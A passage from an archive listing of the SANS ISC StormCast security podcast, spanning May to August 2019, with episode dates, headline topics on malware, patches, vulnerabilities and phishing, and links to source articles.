KAPE vs. Commando VM: Red vs. Blue https://isc.sans.edu/forums/diary/KAPE+Kroll+Artifact+Parser+and+Extractor/25258/ Attacks against Exposed Sphinx Servers https://www.bsi.bund.de/EN/Topics/IT-Crisis-Management/CERT-Bund/CERT-Reports/HOWTOs/Open-Sphinx-Server/open-Sphinx-server_node.html Cisco Patches https://tools.cisco.com/security/center/publicationListing.x?product=Cisco&sort=-day_sir&limit=50#~Vulnerabilities Newly Registered Domains Most Dangerous https://unit42.paloaltonetworks.com/newly-registered-domains-malicious-abuse-by-bad-actors/
8/22/2019 - 5 minutes, 38 seconds
Episode Artwork

ISC StormCast for Wednesday, August 21st 2019

Guildma Malware is Now Using Facebook and YouTube as Update Channel https://isc.sans.edu/forums/diary/Guildma+malware+is+now+accessing+Facebook+andYouTube+to+keep+uptodate/25222/ Supply Chain Issues: rest-client ruby gem backdoored https://www.theregister.co.uk/2019/08/20/ruby_gem_hacked/
8/21/2019 - 5 minutes, 39 seconds
Episode Artwork

ISC StormCast for Tuesday, August 20th 2019

iOS 12.4 Jailbreak Released After Reintroduced Vulnerability from 12.2 https://github.com/pwn20wndstuff/Undecimus/releases SHA2-Signed Updates for Windows Not Available with Symantec Endpoint Protection https://support.symantec.com/us/en/article.tech255857.html Attacking and Downgrading Bluetooth Key Negotiation https://knobattack.com
8/20/2019 - 5 minutes, 32 seconds
Episode Artwork

ISC StormCast for Monday, August 19th 2019

Large Number of VoIP System Vulnerabilities Released https://www.sit.fraunhofer.de/en/cve/ Confidential Company Documents Leaked in Public Sandboxes https://blog.cylab.co/2019/08/16/confidential-company-documents-exposed-in-public-sandboxes/ https://www.sit.fraunhofer.de/en/news-events/latest/press-releases/details/news-article/show/gefahr-uebers-telefon/ Trend Micro Password Manager DLL Hijacking https://esupport.trendmicro.com/en-us/home/pages/technical-support/1123396.aspx Firefox Password Manager May Leak Passwords https://www.mozilla.org/en-US/security/advisories/mfsa2019-24/#CVE-2019-11733
8/19/2019 - 5 minutes, 4 seconds
Episode Artwork

ISC StormCast for Friday, August 16th 2019

Analysis of a Spearphishing Maldoc https://isc.sans.edu/forums/diary/Analysis+of+a+Spearphishing+Maldoc/25242/ IoT Security Stagnation https://securityledger.com/2019/08/huge-survey-of-firmware-finds-no-security-gains-in-15-years/ Kaspersky Insecurity https://www.heise.de/ct/artikel/Kasper-Spy-Kaspersky-Anti-Virus-puts-users-at-risk-4496138.html
8/16/2019 - 6 minutes, 21 seconds
Episode Artwork

ISC StormCast for Thursday, August 15th 2019

MedusaHTTP Malware https://isc.sans.edu/forums/diary/Recent+example+of+MedusaHTTP+malware/25234/ Cryptominer uses DuckDNS for C&C https://www.varonis.com/blog/monero-cryptominer/ Intel NUC Vulnerabilities https://www.intel.com/content/www/us/en/security-center/default.html HTTP/2 Vulnerabilities https://github.com/Netflix/security-bulletins/blob/master/advisories/third-party/2019-002.md
8/15/2019 - 6 minutes, 4 seconds
Episode Artwork

ISC StormCast for Wednesday, August 14th 2019

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/August+2019+Microsoft+Patch+Tuesday/25236/ Adobe Patches https://helpx.adobe.com/security.html Windows Text Services Vulnerabilities https://googleprojectzero.blogspot.com/2019/08/down-rabbit-hole.html#ftnt2
8/14/2019 - 5 minutes, 23 seconds
Episode Artwork

ISC StormCast for Tuesday, August 13th 2019

Malicious DAA Attachments https://isc.sans.edu/forums/diary/Malicious+DAA+Attachments/25230/ SQLite Exploits https://research.checkpoint.com/select-code_execution-from-using-sqlite/ Printer Vulnerabilities https://www.defcon.org/html/defcon-27/dc-27-speakers.html#Romero https://www.nccgroup.trust/us/our-research/technical-advisory-multiple-vulnerabilities-in-xerox-printers/?research=Technical+advisories
8/13/2019 - 5 minutes, 42 seconds
Episode Artwork

ISC StormCast for Monday, August 12th 2019

100% JavaScript Phishing Page https://isc.sans.edu/forums/diary/100+JavaScript+Phishing+Page/25220/ Vulnerabilities in DSLR Cameras https://research.checkpoint.com/say-cheese-ransomware-ing-a-dslr-camera/ https://global.canon/en/support/security/d-camera.html Turning Tesla into Surveillance Platform https://github.com/tevora-threat/scout Basic Electron Framework Exploitation https://www.contextis.com/en/blog/basic-electron-framework-exploitation
8/12/2019 - 5 minutes, 28 seconds
Episode Artwork

ISC StormCast for Friday, August 9th 2019

Kubernetes Security Audit Published https://github.com/kubernetes/community/blob/master/wg-security-audit/findings/Kubernetes%20Final%20Report.pdf https://www.cncf.io/blog/2019/08/06/open-sourcing-the-kubernetes-security-audit/ Apple Expands Bug Bounty https://www.blackhat.com/us-19/briefings/schedule/index.html#behind-the-scenes-of-ios-and-mac-security-17220 https://www.forbes.com/sites/thomasbrewster/2019/08/08/apple-confirms-1-million-reward-for-hackers-who-find-serious-iphone-vulnerabilities/ 0-Day Privilege Escalation in Steam Client https://amonitoring.ru/article/steamclient-0day/ Actual Sextortion Trojan https://www.welivesecurity.com/2019/08/08/varenyky-spambot-campaigns-france/
8/9/2019 - 6 minutes, 27 seconds
Episode Artwork

ISC StormCast for Thursday, August 8th 2019

AT&T Insiders Bribed to Obtain Unlock Codes https://www.justice.gov/usao-wdwa/press-release/file/1191031/download Older RDP Vulnerability Can be Used for HyperV VM Escape https://www.microsoft.com/security/blog/2019/08/07/a-case-study-in-industry-collaboration-poisoned-rdp-vulnerability-disclosure-and-response/ Cisco Patches Smart Switch 220 Vulnerabilities https://tools.cisco.com/security/center/publicationListing.x Firefox for Android Supporting WebAuthn https://blog.mozilla.org/security/2019/08/05/web-authentication-in-firefox-for-android/
8/8/2019 - 6 minutes, 31 seconds
Episode Artwork

ISC StormCast for Wednesday, August 7th 2019

Corporate IoT Used in Intrusion https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/ New Spectre Variant: SWAPGS https://www.bitdefender.com/business/swapgs-attack.html New WPA3 Weaknesses https://wpa3.mathyvanhoef.com/#new
8/7/2019 - 6 minutes, 15 seconds
Episode Artwork

ISC StormCast for Tuesday, August 6th 2019

Sextortion E-Mail: Where Did the Winnings Go https://isc.sans.edu/forums/diary/Sextortion+Follow+the+Money+The+Final+Chapter/25204/ VMware Update https://www.vmware.com/security/advisories/VMSA-2019-0012.html Android Update Fixes Qualcomm Bug https://source.android.com/security/bulletin/2019-08-01.html https://blade.tencent.com/en/advisories/qualpwn/
8/6/2019 - 5 minutes, 39 seconds
Episode Artwork

ISC StormCast for Monday, August 5th 2019

Misconfigured JIRA Leaks User Details https://medium.com/@logicbomb_1/one-misconfig-jira-to-leak-them-all-including-nasa-and-hundreds-of-fortune-500-companies-a70957ef03c7 Google, Amazon, Apple Modify Policy on Listening in on Assistant Recordings https://datenschutz-hamburg.de/assets/pdf/2019-08-01_press-release-Google_Assistant.pdf https://www.bloomberg.com/news/articles/2019-08-02/amazon-gives-option-to-disable-human-review-of-alexa-recordings https://www.theverge.com/2019/8/2/20751270/apple-stops-contractors-siri-voice-recordings-privacy-opt-out https://www.blog.google/products/assistant/more-information-about-our-processes-safeguard-speech-data/ NVIDIA Updates https://nvidia.custhelp.com/app/answers/detail/a_id/4841/kw/Security%20Bulletin Detecting Incognito Mode in Google Chrome 76 https://blog.jse.li/posts/chrome-76-incognito-filesystem-timing/
8/5/2019 - 5 minutes, 52 seconds
Episode Artwork

ISC StormCast for Friday, August 2nd 2019

What Is Listening On Port 9527/TCP https://isc.sans.edu/forums/diary/What+is+Listening+On+Port+9527TCP/25194/ PowerShell Empire Abandoned https://github.com/EmpireProject/Empire https://twitter.com/xorrior/status/1156626182978383874 Cryptomining via GitHub/PasteBin C&C https://unit42.paloaltonetworks.com/rockein-the-netflow/
8/2/2019 - 5 minutes, 31 seconds
Episode Artwork

ISC StormCast for Thursday, August 1st 2019

Phishing Attack Targeting Financial Sector https://isc.sans.edu/forums/diary/Targeted+Phishing+Attacks+in+the+Financial+Industry+Fire3+Phishing+Kit/25188/ Enterprise Software Phoning Home https://www.extrahop.com/company/press-releases/2019/extrahop-issues-warning-about-phoning-home/ Google Stripping www and https Again https://bugs.chromium.org/p/chromium/issues/detail?id=883038#c114 Bypassing VISA Contactless Limits https://www.ptsecurity.com/ww-en/about/news/visa-card-vulnerability-can-bypass-contactless-limits/
8/1/2019 - 6 minutes, 27 seconds
Episode Artwork

ISC StormCast for Wednesday, July 31st 2019

Luno Phishing E-Mail and Badly Implemented 2FA https://isc.sans.edu/forums/diary/Can+You+Spell+2FA+A+Luno+Phish+Example/25186/ Google Chrome Update https://w3c.github.io/webappsec-fetch-metadata/ https://chromereleases.googleblog.com/2019/07/stable-channel-update-for-desktop_30.html Apple Re-Releases 2019-004 Security Update for Sierra/High Sierra https://support.apple.com/en-us/HT210348 Disabling Server Side Recording of Apple Siri Commands https://github.com/jankais3r/Siri-NoLoggingPLS
7/31/2019 - 5 minutes, 49 seconds
Episode Artwork

ISC StormCast for Tuesday, July 30th 2019

11 Flaws in VxWorks IPNet TCP/IP Stack https://go.armis.com/urgent11 iOS iMessage File Disclosure Vulnerability https://bugs.chromium.org/p/project-zero/issues/detail?id=1858
7/30/2019 - 6 minutes, 34 seconds
Episode Artwork

ISC StormCast for Monday, July 29th 2019

DVRIP Port 34567 Uptick https://isc.sans.edu/forums/diary/DVRIP+Port+34567+Uptick/25174/ LibreOffice LibreLogo Macro Python Code Injection https://insinuator.net/2019/07/libreoffice-a-python-interpreter-code-execution-vulnerability-cve-2019-9848/ Extracting Private Key From Amazon Music Application https://koen.io/2019/07/26/underscoring-the-private-in-private-key/
7/29/2019 - 7 minutes, 13 seconds
Episode Artwork

ISC StormCast for Friday, July 26th 2019

When Users Attack: Users and Admins Thwarting Security Controls https://isc.sans.edu/forums/diary/When+Users+Attack+Users+and+Admins+Thwarting+Security+Controls/25170/
Immunity's Canvas Now Includes BlueKeep Exploit https://twitter.com/Immunityinc/status/1153752470130221057
Johannesburg Power Outages Due To Ransomware https://twitter.com/CityofJoburgZA https://www.theregister.co.uk/2019/07/25/johannesburg_ransomware_infection/
Darkmatter Intermediate Certificate Trust Removed From Google Chrome https://groups.google.com/forum/#!topic/mozilla.dev.security.policy/7-oKhDBLetQ
7/26/2019, 6 minutes, 22 seconds
ISC StormCast for Thursday, July 25th 2019

VLC not Vulnerable to libebml Vulnerability https://threader.app/thread/1153963312981389312
Cryptominer With BlueKeep Scanner https://www.intezer.com/blog-watching-the-watchbog-new-bluekeep-scanner-and-linux-exploits/
Elasticsearch Vulnerabilities used to install DDoS Bot https://blog.trendmicro.com/trendlabs-security-intelligence/multistage-attack-delivers-billgates-setag-backdoor-can-turn-elasticsearch-databases-into-ddos-botnet-zombies/
May People Be Considered As IOC? https://isc.sans.edu/forums/diary/May+People+Be+Considered+as+IOC/25166/
7/25/2019, 5 minutes, 48 seconds
ISC StormCast for Wednesday, July 24th 2019

Verifying SSL/TLS Configuration https://isc.sans.edu/forums/diary/Verifying+SSLTLS+configuration+part+1/25162/ https://www.sans.org/webcasts/beast-poodle-celebrating-sweet32-111400
Apple Updates Everything https://support.apple.com/en-us/HT201222
QNAP/Synology Security Advisories https://www.qnap.com/en-us/security-advisory/nas-201907-11 https://www.facebook.com/synologydeutschland/photos/a.1594837477441905/2417134061878905/
New BlueKeep Writeup https://github.com/0xeb-bp/bluekeep
7/24/2019, 6 minutes, 1 second
ISC StormCast for Tuesday, July 23rd 2019

Analyzing Compressed PowerShell Scripts https://isc.sans.edu/forums/diary/Analyzing+Compressed+PowerShell+Scripts/25158/
Palo Alto GlobalProtect Pre-Auth RCE http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html
Fortinet Vulnerability https://fortiguard.com/psirt/FG-IR-19-144
ProFTPD Permission Bypass Vulnerability https://tbspace.de/cve201912815proftpd.html
7/23/2019, 5 minutes, 22 seconds
ISC StormCast for Monday, July 22nd 2019

PHP Malware https://isc.sans.edu/forums/diary/Malicious+PHP+Script+Back+on+Stage/25148/
Drupal Vulnerabilities https://www.drupal.org/sa-core-2019-008
iNSYNQ Breach https://www.insynq.com/support/#status
7/22/2019, 6 minutes, 10 seconds
ISC StormCast for Friday, July 19th 2019

802.1x Tips https://isc.sans.edu/forums/diary/The+Other+Side+of+Critical+Control+1+8021x+Wired+Network+Access+Controls/25146/
Kazakhstan TLS Interception https://groups.google.com/forum/#!msg/mozilla.dev.security.policy/wnuKAhACo3E/cpsvHgcuDwAJ
BEC Trends https://www.fincen.gov/sites/default/files/shared/FinCEN_Financial_Trend_Analysis_FINAL_508.pdf
Cylance Weakness https://skylightcyber.com/2019/07/18/cylance-i-kill-you/
7/19/2019, 7 minutes, 2 seconds
ISC StormCast for Thursday, July 18th 2019

Analysis of DNS TXT Records https://isc.sans.edu/forums/diary/Analyzis+of+DNS+TXT+Records/25142/
EvilGnome Linux Malware https://www.intezer.com/blog-evilgnome-rare-malware-spying-on-linux-desktop-users/
New American Express Phishing Attacks https://cofense.com/phishing-attacker-takes-american-express-victims-credentials/
7/18/2019, 6 minutes, 16 seconds
ISC StormCast for Wednesday, July 17th 2019

Zoom/Apple Patches Additional Software https://www.theverge.com/2019/7/16/20696529/apple-mac-silent-update-zoom-ringcentral-zhumu-vulnerabilty-patched
Lenovo/Iomega NAS API Vulnerability https://www.theregister.co.uk/2019/07/16/iomega_nas_boxes/
Amadeus Vulnerability Allows Access to Boarding Passes https://www.7elements.co.uk/resources/technical-advisories/insecure-direct-object-reference-within-amadeus-check-in-application/
FBI Releases GandCrab Master Keys https://www.documentcloud.org/documents/6199678-GandCrab-Master-Decryption-Keys-FLASH.html
Android Media File Jacking https://www.symantec.com/blogs/expert-perspectives/symantec-mobile-threat-defense-attackers-can-manipulate-your-whatsapp-and-telegram-media
7/17/2019, 5 minutes, 40 seconds
ISC StormCast for Tuesday, July 16th 2019

isodump.py and Malicious ISO Files https://isc.sans.edu/forums/diary/isodumppy+and+Malicious+ISO+Files/25134/
Atlassian Crowd Vulnerability Details https://www.corben.io/atlassian-crowd-rce/
Scrapy Vulnerabilities https://medium.com/alertot/web-scraping-considered-dangerous-leaking-files-from-the-spiders-host-bd508f81d498
iOS URL Scheme Susceptible to Hijacking https://blog.trendmicro.com/trendlabs-security-intelligence/ios-url-scheme-susceptible-to-hijacking/
7/16/2019, 6 minutes, 30 seconds
ISC StormCast for Monday, July 15th 2019

Magecart Targets S3 Buckets https://www.riskiq.com/blog/labs/magecart-amazon-s3-buckets/
Atlassian Jira Vulnerability https://confluence.atlassian.com/jira/jira-security-advisory-2019-07-10-973486595.html
Microsoft to Detect Phishing in Forms https://www.microsoft.com/en-us/microsoft-365/roadmap?filters=&searchterms=52927
Tracking Anonymized Bluetooth Devices https://petsymposium.org/2019/files/papers/issue3/popets-2019-0036.pdf
7/15/2019, 6 minutes, 6 seconds
ISC StormCast for Friday, July 12th 2019

Analysis of a Recent AZORult Sample https://isc.sans.edu/forums/diary/Recent+AZORult+activity/25120/
Apple Deletes Zoom Web Server https://www.macrumors.com/2019/07/10/apple-update-remove-zoom-server/
Apple Disables Walkie Talkie App https://techcrunch.com/2019/07/10/apple-disables-walkie-talkie-app-due-to-vulnerability-that-could-allow-iphone-eavesdropping/
Windows PXE Devices May Fail to Boot After Recent Update https://support.microsoft.com/en-in/help/4512816/devices-that-start-up-using-preboot-execution-environment-pxe-images-f
Sean Goodwin: Attackers Inside the Walls: Detecting Malicious Activity https://www.sans.org/reading-room/whitepapers/detection/paper/39055
7/12/2019, 13 minutes, 23 seconds
ISC StormCast for Thursday, July 11th 2019

Samba Project Disabling SMBv1 By Default https://isc.sans.edu/forums/diary/Samba+Project+tells+us+Whats+New+SMBv1+Disabled+by+Default+finally/25116/
GnuPG Will No Longer Import Signatures From Keyservers https://lists.gnupg.org/pipermail/gnupg-announce/2019q3/000439.html
eCh0raix Ransomware https://www.anomali.com/blog/the-ech0raix-ransomware
7/11/2019, 5 minutes, 3 seconds
ISC StormCast for Wednesday, July 10th 2019

MSFT Patch Tuesday https://isc.sans.edu/forums/diary/MSFT+July+2019+Patch+Tuesday/25110/
Adobe Updates https://helpx.adobe.com/security.html
Zoom Vulnerability https://medium.com/bugbountywriteup/zoom-zero-day-4-million-webcams-maybe-an-rce-just-get-them-to-visit-your-website-ac75c83f4ef5
7/10/2019, 6 minutes, 26 seconds
ISC StormCast for Tuesday, July 9th 2019

Canonical GitHub Hack https://news.ycombinator.com/item?id=20373009
New Wave of Magecart Attacks https://gist.github.com/gwillem/5d936f5a84837d5c1dcb488ce256294a
Facebook's Libra Cryptocurrency Already Impersonated https://www.digitalshadows.com/blog-and-research/facebooks-libra-cryptocurrency-cybercriminals-tipping-the-scales-in-their-favor/
7/9/2019, 5 minutes, 27 seconds
ISC StormCast for Monday, July 8th 2019

Does "Godlua" Use DNS over HTTPS or Not? https://www.golem.de/news/verschluesseltes-dns-falschmeldung-in-propagandaschlacht-um-dns-ueber-https-1907-142358.html https://blog.netlab.360.com/an-analysis-of-godlua-backdoor-en/
Exploit for Cisco DCNM Authentication Bypass and RCE https://raw.githubusercontent.com/pedrib/PoC/master/advisories/cisco-dcnm-rce.txt
Magento RCE Exploit https://blog.ripstech.com/2019/magento-rce-via-xss/
Malicious XSL Files https://isc.sans.edu/forums/diary/Malicious+XSL+Files/25098/
7/8/2019, 5 minutes, 40 seconds
ISC StormCast for Wednesday, July 3rd 2019

Zipato SmartHub Vulnerabilities https://blackmarble.sh/zipato-smart-hub/
Blocking DNS over HTTPS https://github.com/bambenek/block-doh
Cloudflare Outage https://www.cloudflarestatus.com/incidents/tx4pgxs6zxdr
Android Update https://source.android.com/security/bulletin/2019-07-01
PowerShell Kill Switch Commands https://isc.sans.edu/forums/diary/Using+Powershell+in+Basic+Incident+Response+A+Domain+Wide+KillSwitch/25088/
7/3/2019, 6 minutes, 9 seconds
ISC StormCast for Tuesday, July 2nd 2019

Maldoc Payloads in User Forms https://isc.sans.edu/forums/diary/Maldoc+Payloads+in+User+Forms/25084/
Zyxel Vulnerabilities https://www.zyxel.com/support/vulnerabilities-related-to-the-Free-Time-feature.shtml
AMD SEV DH Key Recovery https://seclists.org/fulldisclosure/2019/Jun/46
Card Enrollment Service Fraud https://www.advanced-intel.com/post/card-enrollment-services-highly-effective-fraud-methodology-offered-in-russian-underground
7/2/2019, 5 minutes, 21 seconds
ISC StormCast for Sunday, June 30th 2019

Collecting Hashes of Running Processes and Verifying Them with VirusTotal Domain-Wide https://isc.sans.edu/forums/diary/Verifying+Running+Processes+against+VirusTotal+DomainWide/25078/
Mozilla Server Side TLS Guide Updates https://wiki.mozilla.org/Security/Server_Side_TLS
SKS Keyserver DoS Attack https://gist.github.com/rjhansen/67ab921ffb4084c865b3618d6955275f
QR Code Phishing https://cofense.com/radar-phishing-using-qr-codes-evade-url-analysis/
6/30/2019, 6 minutes, 43 seconds
ISC StormCast for Friday, June 28th 2019

New BrickerBot (Silex) Sightings https://twitter.com/_larry0/status/1143532888538984448
Supply Chain Attacks Against Telco Providers https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers
GreenFlash Sundown Malvertising Campaign https://blog.malwarebytes.com/threat-analysis/2019/06/greenflash-sundown-exploit-kit-expands-via-large-malvertising-campaign/
TrackThis Demonstrates How Advertisers Track You https://trackthis.link
Geoff Parker: Automating Phish Reporting Response http://www.sans.org/reading-room/whitepapers/email/automating-response-phish-reporting-39000
6/27/2019, 16 minutes, 42 seconds
ISC StormCast for Wednesday, June 26th 2019

Rig Exploit Kit Installs Pitou.B Trojan https://isc.sans.edu/forums/diary/Rig+Exploit+Kit+sends+PitouB+Trojan/25068/
AWS VPC Traffic Mirroring https://aws.amazon.com/blogs/aws/new-vpc-traffic-mirroring
Elastic SIEM App https://www.elastic.co/blog/introducing-elastic-siem
National Emergency Alerts Potentially Vulnerable to Attack https://www.colorado.edu/today/2019/06/11/emergency-alerts
6/25/2019, 5 minutes, 46 seconds
ISC StormCast for Tuesday, June 25th 2019

Cloudflare Outage https://blog.cloudflare.com/how-verizon-and-a-bgp-optimizer-knocked-large-parts-of-the-internet-offline-today/ https://isc.sans.edu/forums/diary/Extensive+BGP+Issues+Affecting+Cloudflare+and+possibly+others/25064/
WeTransfer Misdirects Files https://betanews.com/2019/06/21/wetransfer-fail/
Jenkins Pillage https://dolosgroup.io/blog/2019/6/20/pillaging-the-jenkins-treasure-chest
6/24/2019, 7 minutes, 8 seconds
ISC StormCast for Monday, June 24th 2019

OpenSSH Will Start Encrypting Secret Keys in Memory https://marc.info/?l=openbsd-cvs&m=156109087822676&w=2
BlueKeep Patch Rate at 83.4% https://twitter.com/RavivTamir/status/1141788586922119168
Android ADB/SSH Botnet https://www.bleepingcomputer.com/news/security/botnet-uses-ssh-and-adb-to-create-android-cryptomining-army/
6/23/2019, 5 minutes, 33 seconds
ISC StormCast for Friday, June 21st 2019

Updates for Dell SupportAssist https://www.dell.com/support/article/us/en/04/sln317291/dsa-2019-084-dell-supportassist-for-business-pcs-and-dell-supportassist-for-home-pcs-security-update-for-pc-doctor-vulnerability?lang=en
Critical Cisco Vulnerability https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-rmi-cmd-ex
LoudMiner Comes with VM https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/
STI Student Dave Todd: Overcoming the Compliance Challenges in Biometrics https://www.sans.org/reading-room/whitepapers/legal/paper/38970
6/21/2019, 14 minutes, 32 seconds
ISC StormCast for Thursday, June 20th 2019

Critical Patch For WebLogic (CVE-2019-2729) https://isc.sans.edu/forums/diary/Critical+Actively+Exploited+WebLogic+Flaw+Patched+CVE20192729/25050/
Exim Exploits Against Other Mail Servers https://isc.sans.edu/forums/diary/Quick+Detect+Exim+Return+of+the+Wizard+Attack/25052/
SANSFIRE Presentations (to be published soon) https://isc.sans.edu/presentations
6/20/2019, 5 minutes, 35 seconds
ISC StormCast for Wednesday, June 19th 2019

Critical Firefox Update (CVE-2019-11707) https://www.mozilla.org/en-US/security/advisories/mfsa2019-18/#CVE-2019-11707
Bitdefender Releases GandCrab Decryptor https://labs.bitdefender.com/2019/06/good-riddance-gandcrab-were-still-fixing-the-mess-you-left-behind/
Google Launches New Deceptive Site Protections in Chrome https://blog.chromium.org/2019/06/new-chrome-protections-from-deception.html
6/19/2019, 5 minutes, 7 seconds
ISC StormCast for Tuesday, June 18th 2019

TCP SACK Panic DoS in Linux https://github.com/Netflix/security-bulletins/blob/master/advisories/third-party/2019-001.md https://tools.ietf.org/html/rfc879
Logitech Pointer Recall https://www.heise.de/security/meldung/Angreifbare-Logitech-Presenter-Hersteller-tauscht-gefaehrliche-USB-Empfaenger-aus-4423627.html
An Infection from the Rig Exploit Kit https://isc.sans.edu/forums/diary/An+infection+from+Rig+exploit+kit/25040/
6/18/2019, 5 minutes, 45 seconds
ISC StormCast for Monday, June 17th 2019

WhatsApp Phishing https://www.heise.de/newsticker/meldung/Phishing-Mails-gaukeln-Ende-von-WhatsApp-Abonnement-vor-4447165.html
Encrypted Email Phishing https://www.bleepingcomputer.com/news/security/phishing-scam-asks-you-to-login-to-read-encrypted-message/
Android Apps Link to Fake Sites https://news.drweb.com/show/?i=13313&lng=en&c=5
Precomputed Hash Tables https://a.ndronic.us/pre-computed-hash-table-v-1-0/
6/17/2019, 5 minutes, 36 seconds
ISC StormCast for Friday, June 14th 2019

Exim Flaw Exploited https://www.cybereason.com/blog/new-pervasive-worm-exploiting-linux-exim-server-vulnerability
Yubico Recalling FIPS Certified YubiKeys https://www.yubico.com/support/security-advisories/ysa-2019-02/
Vulnerable Infusion Pumps https://www.bd.com/en-us/support/product-security-and-privacy/product-security-bulletins/alaris-gateway-workstation-unauthorized-firmware
Telegram DDoS Attack https://twitter.com/telegram/status/1138768124914929664
Ghidra Tips for IDA Users: Function Call Graphs https://isc.sans.edu/forums/diary/A+few+Ghidra+tips+for+IDA+users+part+4+function+call+graphs/25032/
Joel Chapman: Security Considerations for Voice over WiFi (VoWiFi) Systems https://www.sans.org/reading-room/whitepapers/telephone/paper/38945
6/14/2019, 15 minutes, 15 seconds
ISC StormCast for Thursday, June 13th 2019

SandboxEscaper Publishes Additional CVE-2019-0841 Bypass http://archive.is/3toQY http://sandboxescaper.blogspot.com/p/disclosures_8.html
Bypassing NTLM Message Signing (CVE-2019-1040) https://blog.preempt.com/drop-the-mic
Details About macOS KeySteal Vulnerability https://www.pinauten.de/resources/KeySteal_OBTS_2019.pdf
6/13/2019, 5 minutes, 10 seconds
ISC StormCast for Wednesday, June 12th 2019

Microsoft Patches https://isc.sans.edu/forums/diary/MSFT+June+2019+Patch+Tuesday/25024/
Adobe Patches https://helpx.adobe.com/security.html
SAP Security Notes https://www.onapsis.com/blog/sap-patch-notes-june-2019
Intel Updates https://www.us-cert.gov/ncas/current-activity/2019/06/11/Intel-Releases-Security-Updates-Mitigations-Multiple-Products
Microsoft Certificate DoS https://bugs.chromium.org/p/project-zero/issues/detail?id=1804
GPS Receiver Woes https://www.flightglobal.com/news/articles/collins-gps-outage-grounds-regional-flights-458819/
RAMBleed Attack (CVE-2019-0174) https://www.documentcloud.org/documents/6150180-RamBleed-attack-CVE-2019-0174.html
6/12/2019, 6 minutes, 13 seconds
ISC StormCast for Tuesday, June 11th 2019

Interesting JavaScript Obfuscation Example https://isc.sans.edu/forums/diary/Interesting+JavaScript+Obfuscation+Example/25020/
Spam Taking Advantage of DNS over HTTPS https://myonlinesecurity.co.uk/it-looks-like-another-dns-compromise-hack-happening/
European Mobile Operator Traffic Leaked to China https://arstechnica.com/information-technology/2019/06/bgp-mishap-sends-european-mobile-traffic-through-china-telecom-for-2-hours/?comments=1
VLC Update Patches Various Security Flaws http://www.jbkempf.com/blog/post/2019/VLC-3.0.7-and-security
6/11/2019 - 6 minutes, 9 seconds

ISC StormCast for Monday, June 10th 2019

Keep An Eye On Your WMI Logs https://isc.sans.edu/forums/diary/Keep+an+Eye+on+Your+WMI+Logs/25012/
Sysmon DNS Query Logging https://isc.sans.edu/forums/diary/Tip+Sysmon+Will+Log+DNS+Queries/25016/
Komodo Agama Vulnerability and Breach https://komodoplatform.com/update-agama-vulnerability/
Lessons Learned From Microsoft SOC https://www.microsoft.com/security/blog/2019/06/06/lessons-learned-from-the-microsoft-soc-part-2b-career-paths-and-readiness/
6/10/2019 - 7 minutes, 37 seconds

ISC StormCast for Friday, June 7th 2019

GoldBrute Botnet Brute Forcing RDP https://isc.sans.edu/forums/diary/GoldBrute+Botnet+Brute+Forcing+15+Million+RDP+Servers/25002/
Exim Vulnerability https://isc.sans.edu/forums/diary/Time+is+partially+on+our+side+the+new+Exim+vulnerability/25008/
iOS App Developers Disabling TLS https://www.wandera.com/mobile-security/ios-app-developer-security-shortcuts/
6/6/2019 - 7 minutes, 14 seconds

ISC StormCast for Thursday, June 6th 2019

Android Monthly Update https://source.android.com/security/bulletin/2019-06-01
Google Chrome Updates https://chromereleases.googleblog.com/2019/06/stable-channel-update-for-desktop.html
MacOS Malware Injects Bing Ads https://www.airoav.com/mitm-proxy-a-new-search-hijack-method-on-mojave/
Kubernetes Vulnerability https://github.com/kubernetes/kubernetes/issues/78308
Vulnerabilities in Phishing Kits https://blogs.akamai.com/sitr/2019/06/identifying-vulnerabilities-in-phishing-kits.html
6/6/2019 - 5 minutes, 22 seconds

ISC StormCast for Wednesday, June 5th 2019

Vulnerability in Notepad https://threatpost.com/researcher-exploits-microsofts-notepad-to-pop-a-shell/145242/
Vulnerability in vim/neovim https://github.com/numirias/security/blob/master/doc/2019-06-04_ace-vim-neovim.md
RDP Session Hijack Vulnerability https://kb.cert.org/vuls/id/576688/
6/5/2019 - 5 minutes, 33 seconds

ISC StormCast for Tuesday, June 4th 2019

Bypassing macOS Synthetic Click Protection https://www.wired.com/story/apple-macos-bug-synthetic-clicks/
Intel Microcode Updates for Older Windows 10 Versions https://support.microsoft.com/en-us/help/4494454/kb4494454-intel-microcode-updates
Fake Antivirus Ads in Microsoft Games https://answers.microsoft.com/en-us/windows/forum/all/malvertising-attack-on-microsoft-games/ced7ab87-7e0e-422b-97b7-fbfaed2b68a0
GandCrab Shutting Down https://www.zdnet.com/article/gandcrab-ransomware-operation-says-its-shutting-down/
6/4/2019 - 5 minutes, 27 seconds

ISC StormCast for Monday, June 3rd 2019

Google Outage https://status.cloud.google.com/incident/compute/19003
Major Vulnerability in Siemens LOGO Controllers https://cert-portal.siemens.com/productcert/pdf/ssa-542701.pdf
Exposing TOR Users Via Cache Poisoning https://blog.duszynski.eu/tor-ip-disclosure-through-http-301-cache-poisoning/
nginx njs Vulnerability https://github.com/nginx/njs/issues/131
6/3/2019 - 5 minutes, 57 seconds

ISC StormCast for Friday, May 31st 2019

Analysing Shellcode with scdbg https://isc.sans.edu/forums/diary/Analyzing+First+Stage+Shellcode/24984/
GitHub Automating Security Patches https://help.github.com/en/articles/configuring-automated-security-fixes
Exposed Docker Containers Used for Cryptocoin Mining https://blog.trendmicro.com/trendlabs-security-intelligence/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims/
Mozilla Objecting To Web Packaging https://docs.google.com/document/d/1ha00dSGKmjoEh2mRiG8FIA5sJ1KihTuZe-AXX1r8P-8/preview#
5/31/2019 - 6 minutes, 43 seconds

ISC StormCast for Thursday, May 30th 2019

Behavioural Malware Analysis With Microsoft Attack Surface Analyzer https://isc.sans.edu/forums/diary/Behavioural+Malware+Analysis+with+Microsoft+ASA/24980/
Docker Symlink Race Attack https://seclists.org/oss-sec/2019/q2/131
Nansh0u Campaign Using Signed Rootkit https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
5/30/2019 - 6 minutes, 7 seconds

ISC StormCast for Wednesday, May 29th 2019

